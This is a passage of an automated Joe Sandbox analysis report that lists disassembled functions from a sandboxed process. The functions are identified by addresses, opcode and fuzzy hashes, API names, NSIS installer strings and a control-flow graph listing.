                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ac9070b77d168063e3289deac0bcc301f33ff23f73ddcbb0dafdf9207fc7dab5
                                                  • Instruction ID: 79914c3fbe56e1ca01ef9723a97a164b2c74cb6605e01d764a8a01d2b1114175
                                                  • Opcode Fuzzy Hash: ac9070b77d168063e3289deac0bcc301f33ff23f73ddcbb0dafdf9207fc7dab5
                                                  • Instruction Fuzzy Hash: 1890026160140813D54065584914617004587D0346F51C857A2065516ECA39CC697135
                                                  Function 34542ED0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 26d2cc315d15457db5486384b722a2b142b0a6903ce5e08e26a1b492abdb2640
                                                  • Instruction ID: f94c4ccdb7b44ca1210200272511a5d509cc79b89dabda6b3b39456e46968bf6
                                                  • Opcode Fuzzy Hash: 26d2cc315d15457db5486384b722a2b142b0a6903ce5e08e26a1b492abdb2640
                                                  • Instruction Fuzzy Hash: D0900221A01004524540716889549164045ABE1255751C967A0999511DC569C87D7665
                                                  Function 34542EC0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d13e6e3e8ee17fbbc7528d0313f6b8f22d14d1bbe07b1f398113de39debee7d4
                                                  • Instruction ID: b722b433cab6837283745a3edab37494d29de88c51b2e5d2078f08474ec222a8
                                                  • Opcode Fuzzy Hash: d13e6e3e8ee17fbbc7528d0313f6b8f22d14d1bbe07b1f398113de39debee7d4
                                                  • Instruction Fuzzy Hash: 9B90023160140812D50061584918757004587D0346F51C857A5165516EC675C8A97531
                                                  Function 34542E80 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8c905d6721e198c5b8c2025e4f07cdb0055104222babbfb05f3f4092942dc61a
                                                  • Instruction ID: aa611572ed07df0aafed212e1f789ad092737f3c5f5e4880daf032ceb4b74ec7
                                                  • Opcode Fuzzy Hash: 8c905d6721e198c5b8c2025e4f07cdb0055104222babbfb05f3f4092942dc61a
                                                  • Instruction Fuzzy Hash: 1990047171100453D504715C451471700C5C7F1345F51CC57F3155515CC53DCC7D7135
                                                  Function 34542EB0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08ea1df5ba8954a565f2a8b41616d834a15658bfaa948949db3d4b3aaf02c7eb
                                                  • Instruction ID: 4a87eed1c9212c846eb74ec26efc0369ece7cc06550fb5f8c3d6744501a0ad52
                                                  • Opcode Fuzzy Hash: 08ea1df5ba8954a565f2a8b41616d834a15658bfaa948949db3d4b3aaf02c7eb
                                                  • Instruction Fuzzy Hash: 0A90023160140812D5006158492471B004587D0346F51C857A1165516DC635C8697571
                                                  Function 34542F00 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 82c58894998e293bddf3c59adbbd6b7d9f66afae889b0247f6ff56e737e7f2bd
                                                  • Instruction ID: 3e2d2f2d9075cb02d71d0a1a562b1c4d8b98ffdd803b707fd6c8f2b1de4cd5e0
                                                  • Opcode Fuzzy Hash: 82c58894998e293bddf3c59adbbd6b7d9f66afae889b0247f6ff56e737e7f2bd
                                                  • Instruction Fuzzy Hash: 2890022161180452D60065684D24B17004587D0347F51C95BA0155515CC925C8797521
                                                  Function 34542F30 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b4ba60b0f31d24d94a2ecef332fe3795c354fe3406de6ae1a45390baa63e876
                                                  • Instruction ID: 60aa53e7dcb2e91925c626ebe464bc1e2d6abfbc96dbcd2044406bfadc8de043
                                                  • Opcode Fuzzy Hash: 2b4ba60b0f31d24d94a2ecef332fe3795c354fe3406de6ae1a45390baa63e876
                                                  • Instruction Fuzzy Hash: D190022160144852D54062584914B1F414587E1246F91C85FA4157515CC925C86D7721
                                                  Function 34542FB0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9de6cbf8b531220cd072033be7de80c6e528160552147240cbd7fef4c3562b9
                                                  • Instruction ID: a565f7bad9892f8aa57493c27fc5a97422e02777b739b4b20b4d35973e69347b
                                                  • Opcode Fuzzy Hash: e9de6cbf8b531220cd072033be7de80c6e528160552147240cbd7fef4c3562b9
                                                  • Instruction Fuzzy Hash: 3190022164100C12D540715885247170046C7D0645F51C857A0025515DC626C97D76B1
                                                  Function 345438D0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1d39d3ac25ffabf4738d9bd6c01d074f1c560c975666c5e4a0612b9210891eb
                                                  • Instruction ID: e19001c52b9672adceef5f2fb4e77b9faa1534f18a7345c1f6eeab2d522e3ea6
                                                  • Opcode Fuzzy Hash: c1d39d3ac25ffabf4738d9bd6c01d074f1c560c975666c5e4a0612b9210891eb
                                                  • Instruction Fuzzy Hash: C590022164505512D550715C45146264045A7E0245F51C867A0815555DC565C86D7221
                                                  Function 345429D0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 684509a18b5637e767d5bf86250d68cb0e9956c7c460fe0d90e8c0d36d393fae
                                                  • Instruction ID: 508e8fd9eb89d2294854409a8c9aea1f21c3bdb17e85eba8434efd4f1b724f9f
                                                  • Opcode Fuzzy Hash: 684509a18b5637e767d5bf86250d68cb0e9956c7c460fe0d90e8c0d36d393fae
                                                  • Instruction Fuzzy Hash: 889002A1601144A24900A2588514B1A454587E0245B51C85BE1055521CC535C869B135
                                                  Function 345429F0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9096fc7c628128c583d594334235b3fc0137739b11eed9a3fa804071c38b92f4
                                                  • Instruction ID: 62f323264af65af65bbb8d7c7b500365397e6aa929c9d0c7d70fa316619611c6
                                                  • Opcode Fuzzy Hash: 9096fc7c628128c583d594334235b3fc0137739b11eed9a3fa804071c38b92f4
                                                  • Instruction Fuzzy Hash: 9D900225611004130505A5580714517008687D5395351C867F1016511CD631C8797121
                                                  Function 34542A10 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f48b6f1cc68189f433d398758172ade9befcc8050c5af778bc8b55fa4608e9c
                                                  • Instruction ID: ec465c0ffb49c97b40f806360b990c96970dfefed3703f64bf34000f72c57f2e
                                                  • Opcode Fuzzy Hash: 4f48b6f1cc68189f433d398758172ade9befcc8050c5af778bc8b55fa4608e9c
                                                  • Instruction Fuzzy Hash: 84900225621004120545A558071451B048597D6395391C85BF1417551CC631C87D7321
                                                  Function 34542AC0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee22c7983f7cf7cd9c6adc999eb8fee9ae232492a8471e396a58d0df7bdb972a
                                                  • Instruction ID: 4461bd560ea05a3632994d540e7c3832e2de43769ac976c0064d8d8d725ce93d
                                                  • Opcode Fuzzy Hash: ee22c7983f7cf7cd9c6adc999eb8fee9ae232492a8471e396a58d0df7bdb972a
                                                  • Instruction Fuzzy Hash: 4D900231A0500C12D55071584524756004587D0345F51C857A0025615DC765CA6D76A1
                                                  Function 34542A80 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76387d9185f9a66e259321a14c6665c4aee5ab76cca9502fd13afb01f8cf0836
                                                  • Instruction ID: 0911ac6064f6ac2a9ee1b07b759a1a4abab1e1b89a1574874e144515ed31b59a
                                                  • Opcode Fuzzy Hash: 76387d9185f9a66e259321a14c6665c4aee5ab76cca9502fd13afb01f8cf0836
                                                  • Instruction Fuzzy Hash: A190026160200413450571584524626404A87E0245B51C867E1015551DC535C8A97125
                                                  Function 34542AA0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16e22378242168d6ef74c6ebede6b6a9c98da87d019e01dbf5390a90366493d0
                                                  • Instruction ID: 48ebf31791d24617a874290da614d81c2587b5f4c907076618d3e31baa553221
                                                  • Opcode Fuzzy Hash: 16e22378242168d6ef74c6ebede6b6a9c98da87d019e01dbf5390a90366493d0
                                                  • Instruction Fuzzy Hash: 2890023160100C12D50461584914696004587D0345F51C857A6025616ED675C8A97131
                                                  Function 34542B10 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad90e23ea7328b6855749caed4b4458ef599ad6d2e4673d2e68f827d32ab149f
                                                  • Instruction ID: 5f659defb0b9ae68aaaa720a34f48db74f473137b2fc6e85abc47d27697d6b9d
                                                  • Opcode Fuzzy Hash: ad90e23ea7328b6855749caed4b4458ef599ad6d2e4673d2e68f827d32ab149f
                                                  • Instruction Fuzzy Hash: 5190023160100C12D5807158451465A004587D1345F91C85BA0026615DCA25CA6D77A1
                                                  Function 34542B00 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 57c227d3c2657f87f2ce91bb4e2885104850d2c0d32b7cb4869f4c161c43ddeb
                                                  • Instruction ID: 9fd2953da1d04dc9a3c48fb33601a66b313aa39de9890c4577717441c76c6e9c
                                                  • Opcode Fuzzy Hash: 57c227d3c2657f87f2ce91bb4e2885104850d2c0d32b7cb4869f4c161c43ddeb
                                                  • Instruction Fuzzy Hash: 6790023160504C52D54071584514A56005587D0349F51C857A0065655DD635CD6DB661
                                                  Function 34542BC0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de5ddd9316b327840f81c52b0ecfcb832c954df02ae3d57eb58d30277fc31233
                                                  • Instruction ID: cee40cca739af94029faa93910c097fc505237be269163bc9eb428abad3bdada
                                                  • Opcode Fuzzy Hash: de5ddd9316b327840f81c52b0ecfcb832c954df02ae3d57eb58d30277fc31233
                                                  • Instruction Fuzzy Hash: D790023160100812D50065985518656004587E0345F51D857A5025516EC675C8A97131
                                                  Function 34542BE0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 175ff595cc25d81f771a90a5c927b26c0d3b21c082b8484b617c75e096fe63cd
                                                  • Instruction ID: 093e6ae41af5b1dc8c5f9db91380ee0003e397818321bab9ec4a802bb8c45529
                                                  • Opcode Fuzzy Hash: 175ff595cc25d81f771a90a5c927b26c0d3b21c082b8484b617c75e096fe63cd
                                                  • Instruction Fuzzy Hash: FC900221A0500812D54071585528716005587D0245F51D857A0025515DC669CA6D76A1
                                                  Function 34542B80 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f7e504bd4ee05548b75b6629e70f4b0f59c5c3dc1db5cab1829515fde273c50
                                                  • Instruction ID: df0bbab5b88e25000b3ee303db45bdce6c358d16aca617fdf201f12609bab372
                                                  • Opcode Fuzzy Hash: 5f7e504bd4ee05548b75b6629e70f4b0f59c5c3dc1db5cab1829515fde273c50
                                                  • Instruction Fuzzy Hash: 8590023160100C52D50061584514B56004587E0345F51C85BA0125615DC625C8697521
                                                  Function 34542B20 Relevance: .0, Instructions: 2COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: 3660503c6ff56bc0e940e4d25e549845996b133cb348c07ca841280b00fb5ea9
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  Function 004034CE Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 105COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • SetErrorMode.KERNEL32(00008001), ref: 004034EA
                                                  • GetVersionExA.KERNEL32 ref: 00403513
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136219424394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000003.00000002.136219317322.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.136219535508.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.136219635683.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.136219744839.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: ErrorModeVersion
                                                  • String ID: Error writing temporary file. Make sure your temp folder is valid.$NSIS Error$UXTHEME
                                                  • API String ID: 3050056751-1170945346
                                                  • Opcode ID: 2968639f5686e3f7913cfd4f40edf5651004f38a5e3f9ce5abe7678bb6c117d9
                                                  • Instruction ID: c68403fd22cc52622d78d8574aee37a9ee38ff1a0a99c6192f614c07067ac44a
                                                  • Opcode Fuzzy Hash: 2968639f5686e3f7913cfd4f40edf5651004f38a5e3f9ce5abe7678bb6c117d9
                                                  • Instruction Fuzzy Hash: 6C3104705043406FD760AF789E85B6B3AE8BB85348F04053EF4C2B72D2DA3C8905CB6A
                                                  Function 345DA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 544 345da1f0-345da269 call 34512330 * 2 RtlDebugPrintTimes 550 345da41f-345da444 call 345124d0 * 2 call 34544b50 544->550 551 345da26f-345da27a 544->551 553 345da27c-345da289 551->553 554 345da2a4 551->554 556 345da28f-345da295 553->556 557 345da28b-345da28d 553->557 558 345da2a8-345da2b4 554->558 560 345da29b-345da2a2 556->560 561 345da373-345da375 556->561 557->556 562 345da2c1-345da2c3 558->562 560->558 563 345da39f-345da3a1 561->563 564 345da2c5-345da2c7 562->564 565 345da2b6-345da2bc 562->565 567 345da2d5-345da2fd RtlDebugPrintTimes 563->567 568 345da3a7-345da3b4 563->568 564->563 570 345da2cc-345da2d0 565->570 571 345da2be 565->571 567->550 582 345da303-345da320 RtlDebugPrintTimes 567->582 573 345da3da-345da3e6 568->573 574 345da3b6-345da3c3 568->574 572 345da3ec-345da3ee 570->572 571->562 572->563 579 345da3fb-345da3fd 573->579 577 345da3cb-345da3d1 574->577 578 345da3c5-345da3c9 574->578 583 345da4eb-345da4ed 577->583 584 345da3d7 577->584 578->577 580 345da3ff-345da401 579->580 581 345da3f0-345da3f6 579->581 585 345da403-345da409 580->585 586 345da3f8 581->586 587 345da447-345da44b 581->587 582->550 592 345da326-345da34c RtlDebugPrintTimes 582->592 583->585 584->573 588 345da40b-345da41d RtlDebugPrintTimes 585->588 589 345da450-345da474 RtlDebugPrintTimes 585->589 586->579 591 345da51f-345da521 587->591 588->550 589->550 595 345da476-345da493 RtlDebugPrintTimes 589->595 592->550 597 345da352-345da354 592->597 595->550 602 345da495-345da4c4 RtlDebugPrintTimes 595->602 599 345da377-345da38a 597->599 600 345da356-345da363 597->600 601 345da397-345da399 599->601 603 345da36b-345da371 600->603 604 345da365-345da369 600->604 605 345da38c-345da392 601->605 606 345da39b-345da39d 601->606 602->550 610 345da4ca-345da4cc 602->610 603->561 603->599 604->603 607 345da3e8-345da3ea 605->607 608 345da394 605->608 606->563 607->572 608->601 611 345da4ce-345da4db 610->611 612 345da4f2-345da505 610->612 613 345da4dd-345da4e1 611->613 614 345da4e3-345da4e9 611->614 615 345da512-345da514 612->615 613->614 614->583 614->612 616 345da507-345da50d 615->616 617 345da516 615->617 618 345da50f 616->618 619 345da51b-345da51d 616->619 617->580 618->615 619->591
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP:
                                                  • API String ID: 3446177414-2466845122
                                                  • Opcode ID: dc3324f4e74ea60be9cdfee7dd24f7eb934c72cf5a48a1ae09d061809f6c5a53
                                                  • Instruction ID: 6dd3ee4cbfef7d225f84a95702e8967c897f7d36642e2e305a0ca8f5ec93fe9a
                                                  • Opcode Fuzzy Hash: dc3324f4e74ea60be9cdfee7dd24f7eb934c72cf5a48a1ae09d061809f6c5a53
                                                  • Instruction Fuzzy Hash: 61A16575A053128FEB04CE2CC894A1BB7E6FF89250F14492DE945DB311EB70EC46DB91
                                                  Function 34537550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
